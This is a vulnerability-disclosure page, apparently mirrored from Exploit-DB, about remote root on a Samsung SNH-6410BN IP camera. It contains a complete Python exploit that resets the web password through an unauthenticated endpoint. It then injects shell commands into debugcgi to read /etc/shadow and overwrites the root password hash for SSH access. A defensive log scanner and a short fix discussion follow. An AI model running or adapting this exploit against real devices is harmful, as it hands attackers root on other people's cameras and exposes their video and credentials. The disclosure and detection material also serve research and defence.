Samsung smart surveillance camera remote code execution vulnerability disclosed, with PoC - exploit alert - MyHack58

ID MYHACK58:62201678085
Type myhack58
Reporter Anonymous
Modified 2016-08-16T00:00:00


Vulnerability overview

EDB-ID: 40235
Vulnerability found by: PentestPartners
CVE: none
Release date: 2016-08-14
Vulnerability type: remote vulnerability
Affected platforms: hardware
Affected app: none

Foreword

Currently, most security researchers who look at IoT devices focus on how to exploit their vulnerabilities to extend attacks into the network. Very few study how to fix these security issues, and almost nobody cares about how to keep these devices from being attacked again. For that reason we analysed one IP surveillance camera and found many small issues; taken together, they give us root access to the target device. Each is a small problem on its own, yet fixing them is quite difficult. So we decided to write an article specifically about how to find and fix vulnerabilities in IoT devices.

Our research object is a Samsung indoor IP surveillance camera, the SNH-6410BN. Judged purely on quality and functionality this camera has no problems: the image it captures is very sharp, and Samsung ships very good applications with it. However, it is an IP camera, so network security becomes its weak point. Typically the user accesses the camera remotely through the mobile application or the website provided by the "cloud". This camera, however, also exposes SSH and its own web server, and that web server is our test entry point, because it supports only HTTP and not HTTPS.

Exploit code

E-DB Note: source ~

# Python 2 (urllib2, print statement). Reconstructed from the flattened listing above.
import urllib, urllib2, crypt, time

# New password for the web interface
web_password = 'admin'

# New password for root
root_password = 'root'

# IP of the camera
ip = ''

# These are all for the Smartthings bundled camera
realm = 'iPolis'
web_username = 'admin'
base_url = 'http://' + ip + '/cgi-bin/adv/debugcgi?msubmenu=shell&command=ls&command_arg=/...;'

# Take a command and use command injection to run it on the device
def run_command(command):
    # Convert a normal command into one using bash brace expansion
    # Can't send spaces to debugcgi as it doesn't unescape
    command_brace = '{' + ','.join(command.split(' ')) + '}'
    command_url = base_url + command_brace

    # HTTP digest auth for urllib2
    authhandler = urllib2.HTTPDigestAuthHandler()
    authhandler.add_password(realm, command_url, web_username, web_password)
    opener = urllib2.build_opener(authhandler)
    urllib2.install_opener(opener)

    return urllib2.urlopen(command_url)

# Step 1 - change the web password using the unauthed vuln found by zenofex
data = urllib.urlencode({'data': 'NEW;' + web_password})
urllib2.urlopen('http://' + ip + '/classes/class_admin_privatekey.php', data)

# Need to sleep or the password isn't changed
time.sleep(1)

# Step 2 - find the current root password hash
shadow = run_command('cat /etc/shadow')

for line in shadow:
    if line.startswith('root:'):
        current_hash = line.split(':')[1]

# Crypt the new password
new_hash = crypt.crypt(root_password, '00')

# Step 3 - Use sed to search and replace the old for the new hash in the passwd
# This is done because the command injection doesn't allow a lot of different URL encoded chars
run_command('sed -i -e s/' + current_hash + '/' + new_hash + '/g /etc/shadow')

# Step 4 - check that the password has changed
shadow = run_command('cat /etc/shadow')

for line in shadow:
    if line.startswith('root:'):
        current_hash = line.split(':')[1]

if current_hash != new_hash:
    print 'Error! - password not changed'

# Step 5 - ssh to port 1022 with the new root password!
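As an added defensive example (not part of the original advisory or the PentestPartners code), this Python 3 scanner reads web-server access logs and flags the two request patterns the chain above relies on: a POST to /classes/class_admin_privatekey.php and a debugcgi request whose command_arg carries shell metacharacters or brace expansion. The common-log-format layout and the sample lines are constructed assumptions, not the camera's real log output.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed common-log-format lines (an assumption, not the camera's real log
# format): two requests matching the exploit chain above, one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Aug/2016:10:01:02 +0000] "POST /classes/class_admin_privatekey.php HTTP/1.1" 200 12
10.0.0.5 - admin [14/Aug/2016:10:01:04 +0000] "GET /cgi-bin/adv/debugcgi?msubmenu=shell&command=ls&command_arg=/...;%7Bcat,/etc/shadow%7D HTTP/1.1" 200 512
10.0.0.9 - admin [14/Aug/2016:10:02:00 +0000] "GET /cgi-bin/adv/debugcgi?msubmenu=shell&command=ls&command_arg=/tmp HTTP/1.1" 200 80
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Shell metacharacters, or a {a,b} brace expansion like the one the exploit
# above uses in place of spaces.
INJECT_RE = re.compile(r'[;|&`$]|\{[^}]*,[^}]*\}')

def query_params(query):
    """Split on '&' only (older parse_qs also split on ';'), then percent-decode."""
    params = {}
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        params.setdefault(unquote(key), []).append(unquote(value))
    return params

def classify_request(method, target):
    """Return a finding label for one request, or None if it looks benign."""
    url = urlsplit(target)
    if method == 'POST' and url.path == '/classes/class_admin_privatekey.php':
        return 'web password reset via class_admin_privatekey.php'
    if url.path == '/cgi-bin/adv/debugcgi':
        for arg in query_params(url.query).get('command_arg', []):
            if INJECT_RE.search(arg):
                return 'debugcgi command_arg carries shell metacharacters'
    return None

def scan_log(text):
    """Return (source IP, method, target, label) for every suspicious line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        label = classify_request(m['method'], m['target'])
        if label is not None:
            findings.append((m['src'], m['method'], m['target'], label))
    return findings
```

Any hit on the first pattern from a host other than the administrator's is worth a look on its own, since the page describes that endpoint as reachable without authentication.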

Problem one

Description: when the user accesses the device, the network traffic is not encrypted, so the confidentiality and integrity of the user's credentials and data in transit cannot be guaranteed; an attacker on the path can intercept and tamper with them at will.

Solution: use a secure protocol for data transfer wherever possible, and assign each device a random key. The web interface only uses a "private key" to provide basic security, and this "private key" is just a password with no corresponding user name.
